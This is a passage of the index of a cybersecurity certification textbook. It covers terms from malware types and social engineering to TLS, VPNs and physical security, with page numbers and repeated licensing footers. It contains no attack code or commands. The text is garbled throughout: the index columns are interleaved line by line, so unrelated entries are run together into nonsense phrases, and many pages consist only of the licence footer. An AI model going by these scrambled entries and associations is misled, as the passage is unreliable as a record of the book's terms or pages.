persistence malicious managed power distribution memorandum of understanding
code, 395 units (PDUs), 517 (MOU), 323
PowerShell malicious Managed Security Services memory leak, 368-369
indicators, 395 Provider (MSSP), 411 memory management, 385
Python malicious indicators, management information base memory resident, viruses, 83
396 (MIB), 289 memory resident malware
shellcode, 394 management plane, 432 fileless malware, 84-85
Visual Basic for Applications managerial security control, 8 worms, 84-85
(VBA), 396-397 mandatory access control (MAC) Memoryze, 492
malicious external threats, 19 authorization solutions, 201 Message Analyzer tool, 472
malicious internal threats, 19 execution control, 394 message authentication code
malicious process, memory Security-Enhanced Linux, 347 (MAC), 109, 113
resident virus, 83 mandatory vacation, 183 message digest algorithm
malware Mandiant’s APT1, 20 (MDA), 97-98
advance tools against, 329 man-in-the-browser (MitB) metadata
guidelines for, 93 attack, 397 email metadata, 471-472
malware-based attacks man-in-the-middle attack (MitM) file metadata, 471
bluetooth connection application log files, 471 mobile phone, 472
methods, 358 certificate pinning, 140 web metadata, 471
DLL injection, 369 cryptographic attacks, 116-117 Metasploit, 45-46, 91
domain generation algorithm DNS poisoning, 286 MFA (multifactor authentication),
(DGA), 91 firmware over the air 151
fast-flux, 91 updates, 361 MIB (management information
indicators of, 90 high latency indicating, 37 base), 289
malware classifications integrity and resiliency of micro segmentation, 225
adware, 85 data, 113 microservices, 429-430
backdoors, 86-87 mutual authentication Microsoft
cookies, 85 preventing, 157 Active Directory (AD), 288
crypto-malware, 89 near field communications Always-on VPN, 308-309
fileless malware, 84-85 (NFC), 360 App-V, 413-414
keylogger, 85-86 unsecure protocols, 52 Azure
logic bombs, 89-90 mantraps, 543 Functions, 41
payload, 82 marketing team, incident Information Protection,
potentially unwanted response (IR), 458 440, 450
programs (PUPs), 82, 83 maximum tolerable downtime SQL Database, 409
ransomware, 88-89 (MTD), 508-509, 516 Virtual Machines, 409
remote access Trojans MDA (message digest Baseline Security Analyzer
(RATs), 86-87 algorithm), 97-98 (MBSA), 326
rootkits, 87-88 MDM. see mobile device Challenge Handshake
spyware, 85 management (MDM) Authentication Protocol
Trojans, 82, 83 mean time between failures (CHAP), 158
viruses, 82, 83, 83 (MTBF), 510 Cloud App Security, 426
worms, 80, 82, 84-85 mean time to failure (MTTF), 510 DNS services, 287
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-23
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-24 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-25
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-26 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-27
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-28 | Index
attack profile physical port security and MAC PKCS (Public Key Cryptography
black box, 68 filtering Standards), 129
gray box, 68 Dynamic Host Configuration PKCS #12 format, 141
white box, 68 Protocol (DHCP) snooping, 230 PKI. see public key infrastructure
bug bounty, 68 MAC filtering, 230 (PKI)
defined, 67 MAC limiting, 230 places in the network (PIN)
exercise types, 68-69 physical security controls SAFE architecture, 216
passive and active guidelines for, 556 Wi-Fi protected setup
reconnaissance, 69-70 host/environment security (WPS), 239
rules of engagement, 67-68 data sanitization tools, plaintext, 96, 159
percent encoding, 373 553-554 platform as a service (PaaS),
performance limitations, Faraday Cages, 550 409, 410
cryptographic weaknesses, fire detection and playbook, 459, 479
113-114 suppression, 551-552 Play Protect, 347
permissions policies, 421 hot/cold aisles, 551 plenum, 551
persistence, pen test attack life HVAC, 550 pluggable authentication
cycle, 70 protected distribution, 550 module (PAM), 155
persistence malicious code, 395 secure areas, 548-549 plug-ins, 59
persistent (closed) cookies, 374 secure data destruction, PNAC. see port-based NAC
persistent storage acquisition, 493 552-553 (PNAC)
personal area networks (PANs), site security point-to-multipoint (P2M), 362
357, 358-359 alarm systems and point-to-point (P2P), 361-362
personal health information sensors, 543-544 point-to-point protocol (PPP), 304
(PHI), 441-442 barricades and entry/exit point-to-point tunneling
personal identification number points, 541 protocol (PPTP), 303
(PIN), 150, 154 cable locks, 543 policy server, 449
personally identifiable fencing, 541 polymorphic viruses, 83
information (PII), 441 gateways and locks, POP3S (Post Office Protocol
personally owned device use, 209 542-543 v3), 297
person-made disasters, 511 industrial camouflage, 541 POP3S (Secure POP), 297
personnel policies for privilege lighting, 541 port-based NAC (PNAC)
management mantraps, 543 IEEE 802.1x port-based NAC,
job rotation, 182 physical access 166
least privilege, principle of, 182 controls, 540 network access control
mandatory vacation, 183 physical attacks of smart (NAC), 231-232
separation of duties, 182 cards and USB, 543 port filtering/security, 256
pfSense reception personnel and port scan
firewall rule configuration, 258 ID badges, 546 Nmap Security Scanner, 38
Internet Key Exchange security guards and scanless, 41
(IKE), 307 cameras, 544-545 positive air pressure, 550
log parser, 277 site layout, 540-541 POST (forms mechanism), 292
Open VPN, 303-304 piggy backing, 76 post-incident activities phase, 457
PGP (Pretty Good Privacy), PIN (personal identification Post Office Protocol v3
134, 152 number), 150, 154 (POP3S), 297
pharming, 79 PIN (places in the network), post-quantum cryptographic
phishing campaigns, 77-78, 210 216, 239 technology, 120-121
physical access controls, 540 pinch point failures, 216 posture assessment, 231
physical controls, 9, 10 Ping of Death, 248 potentially unwanted programs
physical locks, 542 pinning, digital certificates, 140 (PUPs), 82, 83
physically secure cabled pivoting, pen test attack life power redundancy
network, 550 cycle, 70 batter backups, 517
dual power supplies, 517
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-29
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-30 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-31
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-32 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-33
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-34 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-35
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-36 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-37
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-38 | Index
barricades and entry/exit SOAR. see security orchestration, software development kit
points, 541 automation, and response (SDK), 386
cable locks, 543 (SOAR) software development life cycle
fencing, 541 SOC. see security operations (SDLC)
gateways and locks, 542-543 center (SOC) agile development, 400
industrial camouflage, 541 SOC2. see service organization waterfall model, 400
lighting, 541 control (SOC2) software diversity, 403
mantraps, 543 SOC3. see service organization software exploits, 233
physical access controls, 540 control (SOC3) Software Restriction Policies
physical attacks of smart social engineering techniques (SRP), 394
cards and USB, 543 active reconnaissance, 69 software vulnerabilities, 19, 50-51
reception personnel and ID credential databases, 77 solid state drives (SSD)
badges, 546 credential harvesting, 82 Instant Secure Erase (ISE), 554
security guards and cameras, defined, 74 nonvolatile storage media, 493
544-545 dumpster diving, 76 Secure Erase (SE), 554
site layout, 540-541 guidelines for, 93 secure filmware,
site survey, 236 hoaxes, 78-79 implementing, 320
site-to-site model, 302 identity fraud, 77 Something You Are
skimming, card attacks, 543 impersonation and trust, Authentication, 151
SkyHigh Networks, 426 75-76 Something You Can Do
Sleuth Kit, 491 influence campaigns, 82 Authentication, 152
Small Computer System invoice scams, 77 Something You Do
Interface (SCSI), 520 lunchtime attacks, 77 Authentication, 151
smart buildings, 336 pharming, 79 Something You Exhibit
smart card attacks, 543 phishing, 77-78 Authentication, 152
smart-card authentication, 164 piggy backing, 76 Something You Have
smart cards, 164 prepending, 78-79 Authentication, 150-151
smart devices, 335 pretexting, 75-76 Something You Know
smart meter, 336 principles of, 74-75 Authentication, 150, 152
smartphone authentication, shoulder surfing, 77 Somewhere You Are
348-349 SMiShing, 78 Authentication, 152
S/MIMI (Secure/Multipurpose spam, 78-79 sophistication level, of threat
Internet Mail Extensions), 297-298 spear phishing, 78 actors, 19
S/MINE (Secure Multipart Internet tailgating, 76 SOPs (standard operating
Message Extensions), 134 typosquatting, 79 procedures), 182, 194
SMiShing, 78 vishing, 77-78 source IP affinity, 250
SMS (Short Message Service), 170 watering hole attack, 79 source routing vulnerabilities, 233
SMS (simple message service), 78 whaling, 77-78 SOX. see Sarbanes-Oxley Act (SOX)
SMTPS, 296 social media spam, 78-79, 86-87
Smurf, 248 analysis, 208 Spamhaus, open source
Sn1per, exploitation as attack vectors, 23 intelligence (OSINT), 28
frameworks, 46 threat research sources, 28 SPAN (switched port analyzer),
snapshot, 495 social proof, 75 42, 269-270
snapshot backups, 525-526 Social Security Number (SSN), 441 Spanning Tree Protocol (STP), 228
sniffing, test access port (TAP), 42 soft power, 82 spear phishing, 78
SNMP (Simple Network software as a service (SaaS), 409 specialized systems
Management Protocol), 38, 275, software compliance and facility automation, 336-337
289-290 licensing threat, 502 medical devices, 338
Snort, 268-269 software-defined networking multifunction printers
snowflake systems, 431 (SDN), 431-432 (MFPs), 337
SOAP (Simple Object Access software-defined visibility vehicles and drones, 338
Protocol), 204-205 (SDV), 432 Voice over IP (VoIP), 337
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-39
Special Publications (NIST), 11 transport layer (OSI Layer 4), subscription services, 295
spectrum analyzer, 245 257-258 substitution cipher, 98
split tunnel, VPN client state laws, 14 superuser account
configuration, 309 stateless operations, 256 identity and account
spoofed routing information stateless protocol, 374 management controls,
(route injections) vulnerabilities, Statements on Standards for 184-185
233 Attestation Engagements (SSAE), weak host configurations, 51
spyware, 85 11-12 supervisory control and data
SQL injection attacks, 377-378 states of data acquisition (SCADA), 334-335
SRTP (secure transport data at rest, 447 supplicant, 166
protocol), 299 data in processing, 447-448 supply chain, as attack vectors, 23
SSAE. see Statements on data in transit (motion), 447 supply chain assessment, third-
Standards for Attestation data in use, 447 party risks, 54-55
Engagements (SSAE) state table, 257 Suricata, 268
SSH. see Secure Shell (SSH) static acquisition, 493 surveillance systems, 336-337,
SSH client authentication, 312 static and dynamic source 544-545
SSH commands, 313 NAT, 264 suspended certificates, 138-139
SSH FTP (SFTP), 296 static code analysis, 387 SWG (secure web gateway), 272
SSID (service set identifier), 235 static known treats, 19 switched port analyzer (SPAN),
SSL (Secure Sockets Layer), 292 statistical deviation analysis, 468 42, 269-270
SSL VPN, 303-304 steganography, 121-122 switches, 217, 469, 518
SSO (single sign-on), 155, 295 STIGs, 12 Symantec
SSRF. see server-side request Stingray/International Mobile Blue Coat, 426
forgery (SSRF) Subscriber Identity (IMSI) data loss prevention (DLP), 450
SSTP (Secure Sockets Tunneling catcher, 361 Symantec/Broadcom, 345
Protocol), 304 storage area networks (SANs), symmetric cipher, 112
stacked overflow, 367 520, 527 symmetric encryption
Staged Payloads, 347 storage profiles, 421 Advanced Encryption
staging, development storage segmentation, 353 Standard (AES), 100
environments, 400 stored procedures, 386 block ciphers, 100
stakeholder management, STP (Spanning Tree Protocol), 228 bulk encryption, 105-106
incident response (IR), 458 strategic intelligence, 487-488 cryptographic concepts, 96
standalone intrusion stratum 1 (Top-Level NTP defined, 99
mechanism, 87 servers), 289 digital envelopes, 105-106
standard naming conventions, stream ciphers, 100 initialization vector (IV), 100
531 stress testing, 387-388 key Exchange, 105-106
standard operating procedures structured exception handler key length, 100
(SOPs), 182, 194 (SEH), 385 secret key, 99
standards, 13-14 structured query language (SQL) stream ciphers, 100
standard users, 183 injection attacks, 377-378 synchronous replication, 520
stapling, 140 structured threat information SYN flood attacks, 247
Start-Process, 395 eXpression (STIX) Sysinternals, 90-91
STARTTLS, 288, 296 OASIS CTI framework, 29-30 syslog, 468
state actors, 20-21, 21 Trusted Automated syslog-ng, 468-469
stateful inspection firewalls eXchange of Indicator system accounts, 185
application aware firewalls, Information (TAXII), 30 system and security logs, 469
258 structured threats, 19 system-enforced account
application layer (OSI subject alternative name (SAN), policies, 192-193
Layer 7), 258 digital certificates, 130-131 system integration, third-party
iptables, 258-259 subject name attributes, 130-131 risks, 54
state table, 257 subscriber identity module system memory acquisition
(SIM), 333 crash dump, 492
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-40 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-41
time offset, 486 transit gateways, 424 true random number generator
time synchronization, 289 transparent proxy, 261-262 (TRNG), 114-115
timing attack, 414 Transport Control Protocol (TCP), trust anchor, 318-319
TKIP (Temporal Key Integrity weak network configurations, 52 Trusted Automated eXchange of
Protocol), 237 transport encryption (data-in- Indicator Information (TAXII), 30
TLDs (Top Level Domains), 287 transit), 112 Trusted Computing Group
TLS. see Transport Layer Security transport layer (layer 4), 425 (TCG), 321
(TLS) transport layer (OSI Layer 4), Trusted Platform Module (TPM),
TLS VPN, 303-304 257-258 164-165
token-based key card lock, 542 Transport Layer Security (TLS) trusted platform module (TPM),
tokenization, database application log files, 471 180, 318-319
deidentification methods, 452 cipher suites, 108, 293 trust model, 127
token keys and static codes, secure application protocols, TTP. see tactics, techniques, and
167-168 292-294 procedures (TTP)
tokens, 180 secure wireless tunnel, 301
tombstone, 450 infrastructure, 241-242 tunnel mode, 306
Top Level Domains (TLDs), Key SSL/TLS versions, 293-294 turnstile, 543
Signing Key, 287 Transport Layer Security (TLS) VPN two-factor authentication (2FA),
Top-Level NTP servers Open VPN, 303-304 151, 170
(stratum 1), 289 Point-to-Point Protocol two-person integrity/cpmtrp, 546
topologies, demilitarized zone (PPP), 304 two-step verification, 170
(DMZ) Point-to-Point Tunneling typosquatting, 79
screened hosts, 223 Protocol (PPTP), 303
screened subnet, 222
triple-homed firewall, 222-223
Secure Sockets Tunneling U
Protocol (SSTP), 304
topology discovery U2F (Universal Second
SSL VPN, 303-304
(footprinting), 36-37 Factor), 168
transport mode, 306
TOR (The Onion Router), 25, 26 UAC (user account control),
transposition cipher, 98
TOTP (Time-Based One-Time 201-202
trapdoor function, 101
Password Algorithm), 169 UAV (drones/unmanned aerial
treat actors, types of
TPM (Trusted Platform Module), vehicle), 69-70
advanced persistent threats,
164-165 Ubuntu Linux
20-21, 21
TPM (trusted platform RedHat Linux container,
competitors, 21
module), 180 413-414
criminal syndicates, 21
traceroute root accounts, 185
guidelines for, 33
network reconnaissance Uder Datagram Protocol (UDP)
hackers, 20
tools, 37 transport layer (OSI Layer 4),
hacker teams, 20
packet injection and 257
hacktivists, 20
replay, 44-45 weak network configurations,
tracert, network reconnaissance insider threats, 21-22
52
tools, 37 nation state actors, 21
UEBA. see user and entity
traffic analysis, 43-44 script kiddies, 20
behavior analytics (UEBA)
training/policies, onboarding state actors, 20-21, 21
UEM. see unified endpoint
policies, 181 treat intelligence, 459-460
management (UEM)
training technique diversity trend analysis, 468
unauthorized requests, 381
capture the flag (CTF), triple-homed firewall, 222-223
unformatted error messages,
210-211 TRNG. see true random number
weak network configurations, 53
computer-based training and generator (TRNG)
unified endpoint management
gamification, 211 TRNG (true random number
(UEM), 345
phishing campaigns, 210 generator), 114-115
unified extensible firmware
Transient Electromagnetic Trojans
interface (UEFI), 319
Pulse Emanation Standard defined, 82, 83
uniform resource locator (URL)
(TEMPEST), 550 static known treats, 19
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-42 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-43
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-44 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021